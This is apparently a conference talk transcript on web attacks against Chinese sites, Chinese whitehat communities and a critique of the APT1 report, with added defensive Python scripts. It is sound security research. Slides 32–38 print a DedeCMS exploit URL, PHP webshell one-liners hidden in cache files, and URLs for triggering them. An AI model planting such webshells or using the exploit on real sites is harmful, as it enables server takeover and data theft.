AVTokyo 2013.5 - China is a victim, too :-) (English version)

Anthony LAI, Zetta KE (Researchers, VXRL)

China is always taken as an attacker who attacks others. Let us take a look at who is attacking China, what kinds of attacks China is suffering from and the possible reasons. Moreover, we would like to take an APT research report published by another well-known agency and look at how they "deduce" that the attacks come from China, commenting on their "logic".
In addition, Knownsec has provided captured and identified Web attack data to VXRL for analysis, so hopefully we can get a much clearer picture.
Of course, we have a hidden agenda as well.
It will be a fun session, so let us enjoy it.

  1. China is a victim, too :) (AVTokyo Special Edition)
     Darkfloyd x Zetta, VXRL
  2. Thank you, AVTokyo! Thank you so much to the AVTokyo panelists.
  3. Disclaimer
     We are not working for the China or Hong Kong government.
     We didn't get any fund or money from the Hong Kong and China governments.
  4. Objective
     ● China is always taken as a proactive attacker; we want to show the flip side of the analysis through:
       − Part 1: A single day of Web attack analysis against various web sites in China.
       − Part 2: How do you find out about vulnerabilities published in China-made software and web sites?
         ● The media always talk about blackhats in China. How about whitehats in China?
       − Part 3: APT1 report counter-comment (from Ran2)
  5. Part 1: A single day of Web attack analysis against various web sites in China.
  6. Research and Analysis
     ● Knownsec (Beijing) shared attack logs/data captured by their cloud-based application firewall with VXRL so that we could carry out the analysis.
     ● We picked 11 Nov, a day for online shopping/e-commerce with discounts within Mainland China (Single's Day, 光棍節), for this talk.
     ● We will not disclose any victim's IP address or domain name, depending on the criticality or the nature/impact of the attack.
  7. Single's Day?
  8. Single's Day
  9. Single's Day as Cyber Monday
     http://en.wikipedia.org/wiki/Singles_Day
  10. Research and Analysis
     ● What do we want to observe and analyze?
       − Percentage distribution: attacks from overseas vs. attacks from within the country
       − What kinds of attacks did the top victims suffer?
       − Any top attackers? What are their favourite payloads and skills?
       − What system(s)/platform(s) do the attackers target?
       − Any interesting attack payloads?
  11. 11 Nov: Attack Traffic vs. Period
  12. 11 Nov: Attack Traffic vs. Period: Evening and Night Time
  13. Attack Type Distribution
     Attack Type   No. of Requests   Percentage
     SCANNER       59101248          91.3447%
     LRFI          218753            0.3381%
     FILEI         222774            0.3443%
     SPECIAL       35838             0.0554%
     WEBSHELL      42463             0.0656%
     COLLECTOR     4491625           6.9421%
     SQLI          274792            0.4247%
     XSS           225796            0.3490%
  14. Where are those attackers on e-Shopping Day (11 Nov 2013)?
     According to our analysis, 97.5% is from "within China" IP addresses; the remaining 2.5% of attacks is from overseas, but that includes the scanner type.
  15. How about excluding the scanner type?
     Country       Attacks
     China         1070489
     US            18588
     Netherlands   5404
     Hong Kong     4288
     Korea         1823
     Turkey        1429
     Japan         872
  16. Top 25 Attackers
     The top 25 attacking IP addresses are from China, EXCEPT the 24th, which is from the US.
  17. Case Studies: Victim or not?!
  18. Voting for a "Good Guy"
     Tou.php – "Tou" means "voting"; in Chinese it is "投".
     The requests against this site carry 6.5GB of data.
     In fact, we Chinese are very positive about supporting and promoting "good acts and good guys".
     Possibly it is hard to differentiate the real voters from the robotic ones.
  19. When looking at the traffic, we found attack traffic from Hong Kong: abuse of the X-Forwarded-For header to fake different IP addresses for voting from 58.64.X.X
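The X-Forwarded-For abuse on slide 19 is easy to spot once the web log records both the TCP peer address and the header value. The script below is an added example, not code from the talk or from Knownsec's data set; the log format, the 58.64.1.10 peer, the tou.php path and the trusted-proxy address 10.1.1.1 are all constructed. It flags a single socket address presenting many different X-Forwarded-For values on the voting endpoint, and re-counts the votes by the address that can actually be trusted.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not from the talk's Knownsec data set).
# Assumed log format: <tcp-peer-ip> "<X-Forwarded-For header or ->" "<METHOD> <path>" <status>
SAMPLE_LOG = """\
58.64.1.10 "1.2.3.4" "POST /tou.php?id=17" 200
58.64.1.10 "5.6.7.8" "POST /tou.php?id=17" 200
58.64.1.10 "9.9.9.9" "POST /tou.php?id=17" 200
58.64.1.10 "10.0.0.5" "POST /tou.php?id=17" 200
203.0.113.7 "-" "POST /tou.php?id=17" 200
203.0.113.8 "-" "GET /index.php" 200
10.1.1.1 "198.51.100.2" "POST /tou.php?id=17" 200
"""

LINE_RE = re.compile(
    r'^(?P<remote>\S+) "(?P<xff>[^"]*)" "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d+)$'
)

# Hypothetical: the only reverse proxy whose X-Forwarded-For we trust.
TRUSTED_PROXIES = {"10.1.1.1"}


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def effective_client_ip(rec, trusted=TRUSTED_PROXIES):
    """Decide which address counts as the voter.

    X-Forwarded-For is honoured only when the TCP peer is a trusted proxy;
    otherwise the header is attacker-controlled and the socket address wins.
    When honoured, the rightmost entry is the one our own proxy appended.
    """
    if rec["remote"] in trusted and rec["xff"] != "-":
        return rec["xff"].split(",")[-1].strip()
    return rec["remote"]


def find_xff_spoofers(log_text, path_prefix="/tou.php", threshold=3):
    """Map each untrusted peer IP to the number of distinct X-Forwarded-For
    values it presented on the voting endpoint, keeping those at or above the
    threshold. One socket address cycling through many XFF values is the
    pattern the talk describes for the 58.64.X.X voter."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(path_prefix):
            continue
        if rec["xff"] != "-" and rec["remote"] not in TRUSTED_PROXIES:
            seen[rec["remote"]].add(rec["xff"])
    return {ip: len(v) for ip, v in seen.items() if len(v) >= threshold}


def count_votes(log_text, path_prefix="/tou.php"):
    """Votes per effective client IP, i.e. the tally once the forged header is ignored."""
    votes = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and rec["path"].startswith(path_prefix):
            votes[effective_client_ip(rec)] += 1
    return dict(votes)


if __name__ == "__main__":
    print("XFF spoofers:", find_xff_spoofers(SAMPLE_LOG))
    print("votes by real client:", count_votes(SAMPLE_LOG))
```

The rule the script encodes is the one that matters for the voting site: X-Forwarded-For is evidence only when the TCP peer is your own reverse proxy; from anyone else it is attacker-supplied input, and a vote tally keyed on it counts the 58.64.X.X client once per forged value.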
  20. My favorite ISP :)
  21. Hey, it is 11 Nov (Single's Day) for shopping!
     We found attacks against a "Group Purchase Web site": 47 attempts to access the web site's order info data via the old classical OS command attack.
  22. How about those overseas attackers? Where are they?
     Country      IP
     China        116.252.224.162
     US           173.208.240.190
     Korea        119.70.29.137
     Hong Kong    58.64.205.27
     Thailand     110.34.230.226
     Taiwan       118.233.66.105
     Japan        202.89.232.79
  23. Observation: Any interesting attack payload from overseas?
     From the US?! Using a China-made Python Layer-7 DDoS script?! :) (from 00:00 to 23:59)
  24. Observation: China tools, IP address from the US :)
     http://www.dklkt.cn/article.asp?id=233
  25. How about attack traffic from the US?
  26. How about attack traffic from the US?
     • Scanning and exploiting particular recently released CMS vulnerabilities.
     • We will discuss it in more detail later.
     • Targeting forums and CMS.
  27. How about attack traffic from JP?
  28. How about attack traffic from JP?
     Nothing special, only casual downloads; traffic necessarily from a scanner.
     Interestingly, webscan.360.cn uses a JP IP address to scan hosts in China.
  29. How about attack traffic from KR?
     Nothing special, only casual downloads, not necessarily from a scanner.
     315online.com.cn - an anti-online-fraud portal
  30. How about attack traffic from TW and TH?
     Typical scanner traffic, nothing special.
  31. How about attack traffic from the Netherlands?
     Scanning a WordPress-like site in China.
  32. Observation: Special Payloads against victims
     ● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B
     ● Creates a webshell backdoor under DedeCMS.
     ● Against DedeCMS... I am kidding, there are lots of other victims suffering from this kind of vuln: http://www.wooyun.org/searchbug.php?q=dedecms
  33. DedeCMS (China-made CMS)
  34. DedeCMS
  35. Reference: DedeCMS Exploit
     Interesting technique to hide the webshell: put it in like a cache file.
     http://www.nxadmin.com/penetration/1168.html
     http://blog.csdn.net/seoyundu/article/details/12855759
     /plus/download.php exploit - Inject Webshell
     http://www.xiaosedi.com/post/dedecms_exp_01.html
     /plus/search.php exploit - Inject Webshell
     http://eoo.hk/oswork/28.htm
     DedeCMS backdoor killer from Anquan.org
     http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895
  36. As you have found 90sec.php from the log, and there is an .inc file with this statement:
       {dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}
     However, there is no such file found in the folder. Why?
     Under the data/cache folder, several htm files (myad-1.htm, myad-16.htm, mytag-1208.htm) are found with the following code:
       <!-- document.write("dedecmsisok<?php @eval($_POST[cmd]);?>"); -->
       <!-- document.write("<?php $fp = @fopen('av.php', 'a');@fwrite($fp, '<?php eval($_POST[110]) ?>axxxxx');echo 'OK';@fclose($fp);?>"); -->
       <!-- document.write("<?php echo 'dedecms 5.7 0day<br>guige, 90sec.org';@preg_replace('/ [copyright]/e',$_REQUEST['guige'],'error');?>"); -->
  37. It is strange that an .htm page could be taken as a webshell; the question is whether those htm files are included and generated by another PHP file. After checking, we figured it out: plus/mytag_js.php
  38. Triggering the backdoor webshell with the following URLs by passing in various ID values WITHOUT being detected by the scanner:
     http://www.nxadmin.com/plus/mytag_js.php?id=1208
     http://www.nxadmin.com/plus/ad_js.php?id=1
     Reference: http://www.nxadmin.com/penetration/1168.html
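Slides 32 to 38 give a responder two artefacts to look for: the download.php request whose arrs1[]/arrs2[] arrays carry decimal character codes, and PHP code hidden in data/cache/*.htm files or in {dede:php} tags inside .inc files. The script below is an added example, not the talk's or DedeCMS's code. It decodes the character-code arrays from the slide 32 URL (host replaced by a placeholder, arrs2 left truncated as on the slide) and scans a directory tree for PHP or dede:php tags in non-PHP files, dangerous calls fed from request input, and the preg_replace /e modifier. The sample file contents, the config.inc file name and the VICTIM-HOST placeholder are constructed.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Request from the slide; host replaced by a placeholder, arrs2 truncated as on the slide.
SAMPLE_URL = (
    "http://VICTIM-HOST/plus/download.php?open=1"
    "&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95"
    "&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114"
    "&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120"
    "&arrs2%5B%5D=109&arrs2%5B%5D=121"
)

# Constructed file contents: a poisoned cache page modelled on slide 36, a poisoned
# .inc file, and a clean template.
POISONED_CACHE_HTM = """<!-- document.write("dedecmsisok<?php @eval($_POST[cmd]);?>"); -->
<!-- document.write("<?php @preg_replace('/ [copyright]/e',$_REQUEST['guige'],'error');?>"); -->
"""
POISONED_INC = "{dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}"
CLEAN_HTM = '<html><body><!-- ad slot 1 --><div class="ad">Single\'s Day sale</div></body></html>'

PHP_OPEN = re.compile(r"<\?php|<\?=|\{dede:php\}", re.I)
DANGEROUS_CALL = re.compile(
    r"\b(eval|assert|preg_replace|create_function|file_put_contents|fwrite|system|passthru|shell_exec)\s*\(",
    re.I,
)
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I)
PREG_E_MODIFIER = re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)
NON_PHP_EXT = (".htm", ".html", ".inc", ".js", ".txt", ".css")


def decode_arrs(url):
    """Turn every arrsN[]=<code> array in the query string into the text it spells.

    The request hides its parameters as decimal character codes, so no PHP
    keyword or path appears in the URL; decoding them shows what was really sent.
    """
    decoded = {}
    for key, values in parse_qs(urlsplit(url).query).items():
        if key.startswith("arrs") and key.endswith("[]"):
            try:
                decoded[key[:-2]] = "".join(chr(int(v)) for v in values)
            except ValueError:
                continue  # a non-numeric element: not this payload shape
    return decoded


def is_variable_override_attempt(url):
    """Flag a request whose arrs1 array spells a DedeCMS cfg_ configuration variable."""
    return decode_arrs(url).get("arrs1", "").startswith("cfg_")


def scan_content(name, text):
    """Return finding labels for one file; an empty list means nothing suspicious."""
    findings = []
    has_php = bool(PHP_OPEN.search(text))
    if has_php and name.lower().endswith(NON_PHP_EXT):
        findings.append("php-code-in-non-php-file")
    if has_php and DANGEROUS_CALL.search(text) and REQUEST_INPUT.search(text):
        findings.append("request-input-to-dangerous-call")
    if PREG_E_MODIFIER.search(text):
        findings.append("preg_replace-e-modifier")
    return findings


def scan_tree(root):
    """Walk a DedeCMS install and report files with findings, keyed by relative path."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings = scan_content(fn, fh.read())
            if findings:
                report[os.path.relpath(full, root)] = findings
    return report


if __name__ == "__main__":
    import tempfile
    print("decoded:", decode_arrs(SAMPLE_URL))
    with tempfile.TemporaryDirectory() as root:  # throwaway tree with the constructed files
        os.makedirs(os.path.join(root, "data", "cache"))
        for rel, body in {"data/cache/mytag-1208.htm": POISONED_CACHE_HTM,
                          "data/cache/myad-1.htm": CLEAN_HTM,
                          "data/config.inc": POISONED_INC}.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        print("findings:", scan_tree(root))
```

Decoded, arrs1 on the slide reads cfg_dbprefix, which is why a signature-based scanner sees nothing: the URL contains only digits. The tree scan is the check to run after a suspected compromise; it treats data/cache as untrusted, which is exactly where the slides found the webshells.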
  39. Part 2: Organizations with China Whitehats
  40. Whitehats in China
     Wooyun: Bugs published in China
     ● The idea is the same as CVE/MITRE but more informative and organized
     ● Vendor neutral
     ● Public and open
     ● Promotes the whitehat community (http://www.wooyun.org/whitehats/)
  41. Observation #1: CMS bugs everywhere (after Google Translate)
     http://www.wooyun.org/bug.php?action=list&subtype=52
  42. Observation #2: Even when some whitehats reported the vulns.....
     ● A whitehat reported a high-risk vuln. to 360, but 360 said: Ignored it!
     ● My comment: WTF!
  43. Consistently ignoring high- and medium-level vulns. (highlighted in yellow)
     http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
  44. Observation #3: Positive reward from vendors and promotion of whitehats
  45. Zoomeye (www.zoomeye.org)
  46. Whitehats in China: Anquan.org (a safety alliance among various software and security product vendors)
     ● With 800 vendors
     ● Vendor neutral
     ● A platform for the public to report any infringement, privacy violation, phishing attack, etc.
     ● http://www.anquan.org/help/aboutus/authen/
  47. If time permits... Part 3: APT1 Report – Counter Comment from Ran2, VXRL
  48. APT1 Report: Counter Comment
     ● Has anyone read the Mandiant APT1 Report?
     ● The analysis was done by Ran2, Researcher, VXRL.
     ● Mandiant deduced that the attacks against the US came from China PLA Team #61389 with the following deduction:
       − Attacker profiling via his password
       − Posts in the forum
  49. APT1 Report from Mandiant
     ● On 18 February 2013, Mandiant released an unprecedented report, "APT1: Exposing One of China's Cyber Espionage Units". Mandiant claims that they have identified evidence linking an APT attack group, APT1 (aka Comment Crew), to Military Cover Designator 61398 of the People's Liberation Army (PLA).
  50. APT1 Report from Mandiant
     ● Chinese officials have vigorously denied any link to the APT activities in Mandiant's accusations.
     ● Some commentaries said: "Clearly, Mandiant caught Beijing's hands in the cookie jar".
     ● However, some other responses from skeptics said that the evidence produced by Mandiant did not include any alternative conclusion other than pointing at China, or that the so-called PLA hacking lacks convincing evidence.
  51. Clarification #1: Attacker Profiling
     ● "APT1 is not a ghost in a digital machine", Mandiant claims; they had identified a select number of APT1 personas. On page 51 of the APT1 Report, they provide hints on how they perform the persona profiling, basically by data mining of:
       − the authors of APT1's digital weapons (i.e. the malware)
       − the registrants of APT1 FQDNs (aka FQDN profiling)
       − the email accounts (on public social websites)
       − the registration records of leaked hackers' accounts, Rootkit.com
  52. Clarification #1: Attacker Profiling
     ● Based on the profiling results, Mandiant believed that these three personas were based in Shanghai, responsible for authoring the malware and for preparing and launching the APT1 attacks, and that they are working for the PLA.
     ● UglyGorilla (UG) is the key persona identified that leads to the above conclusion.
  53. Clarification #1: Attacker Profiling
     ● Searching further on the Internet, I also found Jack Wang's postings in the China military forum. However, I discovered that he, UglyGorilla or Jack Wang, actually posted 15 messages; only 2 messages are related to cyber war, and all the other topics include conventional warfare and even biochemical warfare. He even posted to the forum that he was a military warfare lover, but did not mention that he himself was a soldier. I think this piece of information should also be disclosed in the APT1 Report.
  54. Clarification #1: Attacker Profiling
     ● Even though we have a high chance of proving that UglyGorilla is Jack Wang or Wang Dong, who is the author of the APT1 malware, I don't find hard proof that he is a Chinese soldier or serving in PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said he was only a military lover.
  55. Clarification #1: Attacker Profiling
     Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a video captured, I guess it was gathered from an RDP connection on the monitored hop that DOTA once used to register email accounts.
  56. Clarification #1: Attacker Profiling
     ● It is clearly proven that DOTA was using a Shanghai telephone and he is fluent in English when communicating with other parties.
     ● I believe DOTA using the password "2j3c1k" may mean 二局三处一科 (2nd Bureau, 3rd Division, 1st Section), but we cannot rule out that it bears other meanings, such as 二鸡三吃一刻, "the moment of cooking 2 chickens in three different ways".
  57. Clarification #1: Attacker Profiling
     ● Yes, it is interesting, and there are lots of ways to interpret the simple characters in Chinese.
     ● I am not trying to find an exit for the accusation, but I would like to see more solid evidence pointing the finger at PLA Unit 61398 as APT1.
  58. Clarification #2: Infrastructure, Remote Desktop Sessions
     ● On page 4, Mandiant mentioned that "1,849 of the 1,905 sessions were observed using the keyboard layout 'Chinese (Simplified) – US Keyboard'", and they assumed that the attackers used the Chinese version of the Microsoft OS. Because the attackers are using the Chinese version of the Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.
  59. Clarification #2: Infrastructure, Remote Desktop Sessions
     ● Based on the RDP protocol document from Microsoft, I found out that the RDP client sends its keyboard layout as a 4-byte field to the RDP server (the victim or hop, in our case). If a network sniffer is installed on the RDP server, we can collect this piece of digital evidence. If the attackers used "Chinese (Simplified) – US Keyboard", on the recipient side we can locate the 4-byte value 0x0804 in the network packets.
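Slide 59 refers to the keyboardLayout field of the Client Core Data block (TS_UD_CS_CORE in MS-RDPBCGR) that an RDP client sends during connection setup. The block below is an added example, not Ran2's tooling: it assembles a sample block (constructed, client name VXRL-TEST) and parses the keyboardLayout back out so the reader can see what the 0x0804 evidence looks like on the wire. Two caveats matter for an investigator: the MCS Connect Initial that carries this block is cleartext only with Standard RDP Security, so with TLS or CredSSP the capture has to come from the server end or a decrypting proxy; and the value is the client's configured input locale, which any user can change, so on its own it is a weak attribution signal, which is the slide's point.

```python
import struct

# MS-RDPBCGR user-data block types carried in the MCS Connect Initial
# (GCC Conference Create Request).
CS_CORE = 0xC001      # TS_UD_CS_CORE
CS_SECURITY = 0xC002  # TS_UD_CS_SEC

# Windows input-locale identifiers; the talk's value is 0x0804.
KEYBOARD_LAYOUT_NAMES = {
    0x0409: "English (United States)",
    0x0804: "Chinese (Simplified) - US Keyboard",
    0x0404: "Chinese (Traditional) - Taiwan",
    0x0411: "Japanese",
    0x0412: "Korean",
}

# Mandatory part of TS_UD_CS_CORE, all little-endian:
# header(type,len) version width height colorDepth SASSequence keyboardLayout clientBuild
# clientName[32] keyboardType keyboardSubType keyboardFunctionKey imeFileName[64]
CORE_FIXED = struct.Struct("<HHIHHHHII32sIII64s")  # 132 bytes


def build_client_core_data(keyboard_layout, client_name="TEST-PC", build=7601):
    """Assemble a minimal Client Core Data block the way an RDP client would."""
    name = client_name.encode("utf-16le")[:30] + b"\x00\x00"
    return CORE_FIXED.pack(
        CS_CORE, CORE_FIXED.size,
        0x00080004,            # version: RDP 5.0 and later clients
        1024, 768, 0xCA01,     # desktop size, RNS_UD_COLOR_8BPP
        0xAA03,                # SASSequence, always RNS_UD_SAS_DEL
        keyboard_layout, build,
        name.ljust(32, b"\x00"),
        4, 0, 12,              # IBM enhanced keyboard, subtype 0, 12 function keys
        b"\x00" * 64,          # imeFileName, empty
    )


def build_client_security_data(encryption_methods=0x0000001B):
    """TS_UD_CS_SEC, included only so the parser has a second block type to step over."""
    return struct.pack("<HHII", CS_SECURITY, 12, encryption_methods, 0)


def parse_user_data(blob):
    """Walk the user-data blocks and return the core fields, or None if no CS_CORE block."""
    off = 0
    while off + 4 <= len(blob):
        btype, blen = struct.unpack_from("<HH", blob, off)
        if blen < 4 or off + blen > len(blob):
            return None  # malformed length: stop rather than loop or over-read
        if btype == CS_CORE and blen >= CORE_FIXED.size:
            f = CORE_FIXED.unpack_from(blob, off)
            return {
                "version": f[2],
                "desktop": (f[3], f[4]),
                "keyboard_layout": f[7],
                "client_build": f[8],
                "client_name": f[9].decode("utf-16le", errors="replace").split("\x00", 1)[0],
                "keyboard_type": f[10],
            }
        off += blen
    return None


def keyboard_layout_name(code):
    """Human-readable name for a keyboardLayout value (low 16 bits select the locale)."""
    return KEYBOARD_LAYOUT_NAMES.get(code & 0xFFFF, "unknown layout 0x%08X" % code)


# Constructed sample: the blocks a client on a zh-CN Windows box would send, security block first.
SAMPLE_USER_DATA = build_client_security_data() + build_client_core_data(0x00000804, "VXRL-TEST")

if __name__ == "__main__":
    core = parse_user_data(SAMPLE_USER_DATA)
    print(core, "->", keyboard_layout_name(core["keyboard_layout"]))
```

The lookup masks the identifier to its low 16 bits because the high word only distinguishes layout variants of the same locale; that simplification is mine, not the specification's. In a capture, the same walk over the user-data blocks yields the 4-byte value the slide describes, and the parser refuses a truncated or malformed block instead of reading past it.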
  60. More details from the APT1 Counter Comment Report
     − http://espionageware.blogspot.hk/
  61. Summary
     ● Interesting payloads and practices against China sites are shown.
     ● Web attacks from overseas against China on 11 Nov (a day with a high volume of e-commerce and online shopping) are not the majority.
     ● The majority of traffic is crawlers and scanners; other than that, the majority of attacks is SQLi.
     ● There are lots of attacks against CMS systems in China.
     ● There are whitehat non-profit organizations, including Wooyun.org and Anquan.org, helping the China security community.
  62. Summary
     ● Expect technical and/or journalistic reports with more reasonable deduction, sufficient proof and scientific analysis.
     ● We hope to see more balanced views and analysis reports, not just labeling China as the only cyberwar actor in this party.
     ● We hope to see fairer comment that talks about the positive side of security in China.
     ● Selling products and solutions is easy by giving a false sense of "threat"; however, as a researcher, please keep your ethics high and your mindset clear. We are researchers and scientists, not opportunists.
  63. Thank you so much :)
     Respect and appreciation to Zetta and Ran2 for their work, analysis and time.
     Highly appreciate the attack log shared by Knownsec for research purposes.
     darkfloyd@vxrl.org ozetta@vxrl.org ran2@vxrl.org
